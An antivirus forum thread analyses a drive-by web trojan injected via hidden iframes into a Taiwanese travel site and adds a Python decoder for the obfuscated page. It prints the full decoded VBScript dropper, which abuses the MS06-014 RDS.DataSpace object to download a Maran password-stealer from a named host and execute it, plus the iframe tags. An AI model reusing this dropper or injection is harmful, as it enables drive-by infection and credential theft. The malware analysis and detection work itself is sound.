Views: 3812 | Replies: 11

[Virus sample] I'm learning from 刺猬 too

mofunzone
Posted 2007-5-17 11:39:29
Picked one at random, from avpclub
http://www.ilfa.org.tw/
Taiwan's "Leisure Agriculture Yilan Travel" site
At the very end of the page it has been iframe'd:
```html
<iframe src=http://www.gamaniatw.com/img/love.htm width=0 height=0 frameborder=0></iframe>
```

```html
<iframe src=http://www.gamaniatw.com/img/3.htm width=0 height=0 frameborder=0></iframe>
```
The first one is unreachable, gave up on it
Visiting the second one returns "test"
Then view the source:
```html
<HTM L >

<SCRIPT LA NGU A GE="Ja v a s  c ri  pt" >
<!--

document.wri  te(u   nesca  pe("%3C html%3E% 0D% 0A %3Ct      i tl e%3E  %3C%2F t it le% 3 E   %0 D%0A%3C    he  a   d %3ETes t %2 E %2E%2E %  0D% 0A% 3Cbod   y%3  E%0 D% 0    A %3Cscrip t%20lang   u a ge%3D %22VB Scri p t % 22 % 3E% 0D  %0A % 0D %0A  on%20 er ro   r  %20re  sume%2 0ne xt % 0D%0 A%0D%0A oqf n0 b1q824251 2nlkjngkjas    f dhupi1n g3 r gt%3D%22S h ell %  2E A ppl  icat  i  on   %  22%0D% 0 A % 0 D % 0A% 27 %20  due  %20to%20h ow%20aj ax% 2    0w orks%2C%20 t  h e%2    0f ile% 20M  UST  %20 be%20wi thin%20the %20 s am e%2 0  l   o cal %20d   omain%0D  % 0A  d l% 20%3 D %2 0% 2 2  http%3A%2  F%  2F520% 2Egam  an i atw% 2Ecom %2F520% 2 Ee     x  e%22% 0D % 0A%0D% 0A %  2 7 %20 c r ea   te %   20a do dbst ream%20o bje ct %     0D% 0 ASet %  2 0df   %2 0 %   3 D%2 0d  o cu ment%2 E  cr e ateEl   e  ment % 28%22ob j e   ct %2 2%29%0D%0A d f %2 Ese tAt t ri b ut e %20%22c l as  sid%22  % 2C%     2  0%2  2c  l  si d % 3ABD96C556% 2D   65A 3%2 D11 D 0 %2D  98 3 A% 2D00 C04 FC29E36 %2 2%   0D% 0 Astr%3D%2  2 M  i cr   o s oft  %2EXM  LHTTP% 22  %0  D %0 ASe   t %  20 x%20  % 3D%20df %2ECre ateO  bjec t%2 8  st r  %2   C%2 2% 22% 2   9   % 0  D%    0A%0  D%     0 A a1 %  3   D %  22A d o %2    2  %0D%0Aa2   % 3D %22db% 2E   % 22%0D%   0 Aa  3 %3D%2  2S t r%2 2%0 D%0Aa4%3D%2 2  ea   m %22%0D%0A s  tr1%   3Da1% 26a2%2  6a3 %2 6 a 4 % 0D  %0As t  r5% 3Dstr1%0D  %0Aset %20S %2 0  %3 D%2 0df%2Ecreateobj ec t  %28  st  r  5  % 2  C%22%22%29 %  0D% 0AS%  2Etype    %2 0  %3D %20 1%0 D% 0 A  %0D%0 A%   27%20x m l%2 0 ajax%20req %   0D%0A s tr6%3D %22 G E  T%   2 2   %0D     % 0 Ax% 2E   Open%2 0   str6%2 C  %20dl%2C%20 F a  lse% 0D%0A x%2ES  end % 0 D% 0  A % 0 D%0 A%27%  20Ge t% 2    0 temp% 20d i    recto  r y%2  0an  d% 2  0 create  % 2  0o   u   r% 20des   tination% 20 name%  0D%0 A fna me1  % 3D%22220 8 5% 2 E com%  22%0D%0As  et%20F%20  %   3 D% 20df% 2 Ec  r  eateob je c   t%2  8 %22Scr ipti ng  %2  EF ileS yst e  mO  bject%22 %2C%22%2 2%29%0D%0Aset  %2 0tm   p% 20%3D%20F %2 EGe     tS pec ialFold er%28 2%  2 9%20% 2  7  %2  0Ge t  %20t m  p%20fold er%0 D%0A f na m e 1%  3 D %2 0F%2E   Bui  ld Path %28 tmp%2 Cfname1 % 29% 0D%   0AS %2E open%0D%0A%27%2  0open%2  0ad  od b%20st r e   am %2 0 an d % 2   0  wr it  e% 20conte   nts%20of  % 2  0  req  u e s t%2 0to%20fi le%0D %0A % 2  7%20 like% 20vb s% 2  0dl  % 2  B e xec% 2 0 co de%0D%0  A  S%2    Ew rit e%20 x%2E respo nseBody%     0D %0A%27%2  0S a ves%20it% 20     w  it h%20Cr eateO   ve rwri te %2  0fl ag% 0D%0AS%2 Esa    vetofile%20fname1%2 C2%0D%0  A%0D%0AS  % 2 Eclo se% 0D%0 Aset% 2  0 Q %20  % 3D% 20df%2E create object % 28oqfn0 b1q 8242 512nl     kjn gkj asfd  hupi1  ng 3rgt %2 C% 2 2%22  %29  %0D%0A Q%2 ES hel lExe cut e%2  0fna me1% 2 C% 2 2% 22% 2C%22%22%2C%22op  en%22% 2C0% 0 D  %0A%0D%0A     %3 C%2F sc ri pt %  3E%0D % 0  A%3C  % 2Fb o  dy %3E% 0D%0 A%3C  %2 Fh   ead%3E%0D%0A% 3     C  % 2Fht  ml  %3 E " ))
//-   -></ SC RIP T>
< / HTML>
```
Then simply strip out the tedious spaces to get:
```html
<HTML>

<SCRIPT LANGUAGE="Javascript">
<!--

document.write(unescape("%3Chtml%3E%0D%0A%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3Chead%3ETest%2E%2E%2E%0D%0A%3Cbody%3E%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0Aon%20error%20resume%20next%0D%0A%0D%0Aoqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt%3D%22Shell%2EApplication%22%0D%0A%0D%0A%27%20due%20to%20how%20ajax%20works%2C%20the%20file%20MUST%20be%20within%20the%20same%20local%20domain%0D%0Adl%20%3D%20%22http%3A%2F%2F520%2Egamaniatw%2Ecom%2F520%2Eexe%22%0D%0A%0D%0A%27%20create%20adodbstream%20object%0D%0ASet%20df%20%3D%20document%2EcreateElement%28%22object%22%29%0D%0Adf%2EsetAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0Astr%3D%22Microsoft%2EXMLHTTP%22%0D%0ASet%20x%20%3D%20df%2ECreateObject%28str%2C%22%22%29%0D%0A%0D%0Aa1%3D%22Ado%22%0D%0Aa2%3D%22db%2E%22%0D%0Aa3%3D%22Str%22%0D%0Aa4%3D%22eam%22%0D%0Astr1%3Da1%26a2%26a3%26a4%0D%0Astr5%3Dstr1%0D%0Aset%20S%20%3D%20df%2Ecreateobject%28str5%2C%22%22%29%0D%0AS%2Etype%20%3D%201%0D%0A%0D%0A%27%20xml%20ajax%20req%0D%0Astr6%3D%22GET%22%0D%0Ax%2EOpen%20str6%2C%20dl%2C%20False%0D%0Ax%2ESend%0D%0A%0D%0A%27%20Get%20temp%20directory%20and%20create%20our%20destination%20name%0D%0Afname1%3D%2222085%2Ecom%22%0D%0Aset%20F%20%3D%20df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0Aset%20tmp%20%3D%20F%2EGetSpecialFolder%282%29%20%27%20Get%20tmp%20folder%0D%0Afname1%3D%20F%2EBuildPath%28tmp%2Cfname1%29%0D%0AS%2Eopen%0D%0A%27%20open%20adodb%20stream%20and%20write%20contents%20of%20request%20to%20file%0D%0A%27%20like%20vbs%20dl%2Bexec%20code%0D%0AS%2Ewrite%20x%2EresponseBody%0D%0A%27%20Saves%20it%20with%20CreateOverwrite%20flag%0D%0AS%2Esavetofile%20fname1%2C2%0D%0A%0D%0AS%2Eclose%0D%0Aset%20Q%20%3D%20df%2Ecreateobject%28oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt%2C%22%22%29%0D%0AQ%2EShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhead%3E%0D%0A%3C%2Fhtml%3E"))
//--></SCRIPT>
</HTML>
```
At this point, as soon as you save it, AntiVir already flags HTML/Dldr.Maran.AU, strong (a little plug for them)
p.s. I cut the lines at random places; if you want to parse it yourself, download the html attachment below
A-Squared: Found nothing
AntiVir: Found HTML/Dldr.Maran.AU
ArcaVir: Found HTML.JScritp.Lucifer
Avast: Found nothing
AVG Antivirus: Found nothing
BitDefender: Found nothing
ClamAV: Found nothing
Dr.Web: Found nothing
F-Prot Antivirus: Found nothing
F-Secure Anti-Virus: Found nothing
Fortinet: Found nothing
Kaspersky Anti-Virus: Found nothing
NOD32: Found nothing
Norman Virus Control: Found nothing
Panda Antivirus: Found nothing
Rising Antivirus: Found nothing
VirusBuster: Found JS.Psyme.DU
VBA32: Found nothing

Then, looking more carefully, I noticed the argument to unescape()
Simply decoding it as unicode gives:
```html
<html>
<title></title>
<head>Test...
<body>
<script language="VBScript">

on error resume next

oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt="Shell.Application"

' due to how ajax works, the file MUST be within the same local domain
dl = "http://520.gamaniatw.com/520.exe"

' create adodbstream object
Set df = document.createElement("object")
' clsid BD96C556-65A3-11D0-983A-00C04FC29E36 is RDS.DataSpace (MDAC); its CreateObject
' method lets a web page instantiate COM objects that are not safe for scripting (MS06-014)
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")

' ProgID split into fragments so "Adodb.Stream" never appears as one string
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1

' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send

' Get temp directory and create our destination name
fname1="22085.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl+exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2

S.close
set Q = df.createobject(oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt,"")
Q.ShellExecute fname1,"","","open",0

</script>
</body>
</head>
</html>
```
I don't need to spell out the sample link, even if it is fairly old
http://520.gamaniatw.com/520.exe
A-Squared: Found nothing
AntiVir: Found TR/PSW.Maran.AU
ArcaVir: Found nothing
Avast: Found Win32:Lineage-406
AVG Antivirus: Found Generic4.CBU
BitDefender: Found Generic.PWS.Maran.338C67BA
ClamAV: Found nothing
Dr.Web: Found Trojan.PWS.Maran
F-Prot Antivirus: Found nothing
F-Secure Anti-Virus: Found Trojan-PSW.Win32.Maran.eu
Fortinet: Found nothing
Kaspersky Anti-Virus: Found Trojan-PSW.Win32.Maran.eu
NOD32: Found probably a variant of Win32/PSW.Maran (probable variant)
Norman Virus Control: Found nothing
Panda Antivirus: Found Trj/Maran.AR
Rising Antivirus: Found nothing
VirusBuster: Found Trojan.PWS.Maran.EK
VBA32: Found nothing

Was pretty bored today; watching 刺猬 I got an itch to try and wangle some XX membership, haha, just kidding
Catching web trojans is that simple

[This post was last edited by mofunzone on 2007-5-16 19:43]

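The post above does three things by hand: strip the whitespace the attacker sprinkled through the page, percent-decode the unescape() argument, and read the resulting VBScript dropper. The script below is an added example (written for this page, not code from the thread or its author) that automates those steps and then pulls the indicators out of the decoded dropper: URLs, the ActiveX CLSID, and the ProgIDs passed to createobject, reassembling the "Ado"&"db."&"Str"&"eam" split. The SAMPLE string is a constructed, shortened page modelled on the one in the post, and the CLSID-to-name mapping is an assumption drawn from public documentation of MS06-014.

```python
import re

# Constructed sample (not the page's bytes), modelled on the post's obfuscated page:
# the VBScript dropper is percent-encoded, then random whitespace is sprinkled
# through both the HTML wrapper and the encoded payload.
SAMPLE = (
    '<HTM L >\n<SCRIPT LA NGU A GE="Ja v a s c ri pt" >\n<!--\n'
    'document.wri  te(u   nesca  pe("%3Cscrip t%20lang uage%3D%22VB Script%22%3E%0D%0A'
    'on%20 er ror%20re sume%20next%0D%0A'
    'q%3D%22S h ell%2EA ppl icat ion%22%0D%0A'
    'dl%20%3D%20%22http%3A%2F%2F520%2Egam aniatw%2Ecom%2F520%2Eexe%22%0D%0A'
    'Set%20df%20%3D%20document%2EcreateElement%28%22object%22%29%0D%0A'
    'df%2EsetAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556%2D65A3'
    '%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A'
    'Set%20x%20%3D%20df%2ECreateObject%28%22Microsoft%2EXMLHTTP%22%2C%22%22%29%0D%0A'
    'a1%3D%22Ado%22%0D%0Aa2%3D%22db%2E%22%0D%0Aa3%3D%22Str%22%0D%0Aa4%3D%22eam%22%0D%0A'
    'str1%3Da1%26a2%26a3%26a4%0D%0Aset%20S%20%3D%20df%2Ecreateobject%28str1%2C%22%22%29%0D%0A'
    'x%2EOpen%20%22GET%22%2C%20dl%2C%20False%0D%0Ax%2ESend%0D%0A'
    'S%2Ewrite%20x%2EresponseBody%0D%0AS%2Esavetofile%20fname1%2C2%0D%0A'
    'set%20Q%20%3D%20df%2Ecreateobject%28q%2C%22%22%29%0D%0A'
    'Q%2EShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A'
    '%3C%2Fscript%3E"))\n//--></SCRIPT>\n</HTML>'
)

# Assumption: one known CLSID, taken from public MS06-014 documentation.
KNOWN_CLSIDS = {
    'BD96C556-65A3-11D0-983A-00C04FC29E36':
        'RDS.DataSpace (MDAC); CreateObject abused via MS06-014',
}


def js_unescape(s: str) -> str:
    """JavaScript's legacy unescape(): %uXXXX -> one UTF-16 code unit, %XX -> one
    Latin-1 character. urllib.parse.unquote is NOT equivalent: it decodes UTF-8
    byte sequences and leaves %uXXXX alone, which obfuscators rely on."""
    return re.sub(
        r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})',
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def extract_payload(html: str) -> str:
    """Undo the whitespace inflation and decode the unescape() argument.
    Deleting every whitespace character is safe only on the ENCODED text, where
    all real whitespace is %20 / %0D%0A; applied to the decoded script it would
    fuse 'on error resume next' into one token."""
    flat = re.sub(r'\s+', '', html)
    m = re.search(r'unescape\("([^"]*)"\)', flat, re.IGNORECASE)
    if not m:
        raise ValueError('no unescape("...") call found')
    return js_unescape(m.group(1))


ASSIGN_LIT = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
ASSIGN_CAT = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$')


def resolve_strings(vbs: str) -> dict:
    """Fold VBScript string literals and a & b & c concatenations (names are
    case-insensitive) so split ProgIDs like "Ado"&"db."&"Str"&"eam" reassemble."""
    names = {}
    for line in vbs.splitlines():
        m = ASSIGN_LIT.match(line)
        if m:
            names[m.group(1).lower()] = m.group(2)
            continue
        m = ASSIGN_CAT.match(line)
        if m:
            parts = [p.strip().lower() for p in m.group(2).split('&')]
            if all(p in names for p in parts):
                names[m.group(1).lower()] = ''.join(names[p] for p in parts)
    return names


def extract_iocs(vbs: str) -> dict:
    """Collect URLs, CLSIDs and createobject ProgIDs from the decoded dropper and
    flag the download -> write-to-disk -> execute chain."""
    names = resolve_strings(vbs)
    progids = set()
    for m in re.finditer(r'createobject\s*\(\s*(?:"([^"]*)"|(\w+))', vbs, re.IGNORECASE):
        lit, ident = m.groups()
        progids.add(lit if lit is not None
                    else names.get(ident.lower(), '<unresolved ' + ident + '>'))
    clsids = [c.upper() for c in re.findall(r'clsid:([0-9A-Fa-f-]{36})', vbs, re.IGNORECASE)]
    lowered = {p.lower() for p in progids}
    return {
        'urls': re.findall(r'https?://[^\s"\']+', vbs),
        'clsids': [(c, KNOWN_CLSIDS.get(c, 'unknown')) for c in clsids],
        'progids': sorted(progids),
        'dropper': {'microsoft.xmlhttp', 'adodb.stream', 'shell.application'} <= lowered,
    }


if __name__ == '__main__':
    decoded = extract_payload(SAMPLE)
    print(decoded)
    for key, value in extract_iocs(decoded).items():
        print(key, value)
```

Two points worth keeping in mind when reusing this on other samples: the decoder only ever evaluates the encoding, never the payload (no eval, no document.write), so it is safe to run on a live sample; and the whitespace stripping is a property of this particular obfuscator, not a general rule, since a packer that embeds literal spaces in its encoded string would need them preserved.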
aoyang
Posted 2007-5-17 11:44:02
Learned how to catch web trojans

dikex
Posted 2007-5-17 11:55:35
Catching web trojans really is very simple
miller239
Posted 2007-5-17 11:57:32
Stealing 刺猬's job?
Heh~ you're all experts..

Object: 520.exe
        In archive: C:\Documents and Settings\Administrator\桌面\520.rar
        Status: Virus detected
        Virus: Trojan-PSW.Win32.Maran.eu (KAV engine), Generic.PWS.Maran.338C67BA (BD-Engine)
Object: 520.rar
        Path: C:\Documents and Settings\Administrator\桌面
        Status: Virus detected
        Virus: Trojan-PSW.Win32.Maran.eu (KAV engine), Generic.PWS.Maran.338C67BA (BD-Engine)

That html one got past it..
九尾野狐
Posted 2007-5-17 12:02:10
This could serve as a tutorial on catching web trojans

Heh
buycard
Posted 2007-5-17 12:04:10
unescape is the most elementary, simplest thing there is; if you can't even decode that, better leave decoding alone.


Anything planted with a bit of skill is ASCII+FSO; to decode it you have to be able to write FSO.
欠妳緈諨
Posted 2007-5-17 12:06:35
AVAST flagged one
小邪邪
Posted 2007-5-17 12:32:27
McAfee kills it too
费饭饭
Posted 2007-5-17 13:03:19
I'm learning to catch web trojans too, heh
bridgewr
Posted 2007-5-17 17:42:54
Micropoint kills it
Copyright © KaFan KaFan.cn All Rights Reserved. Powered by Discuz! X3.4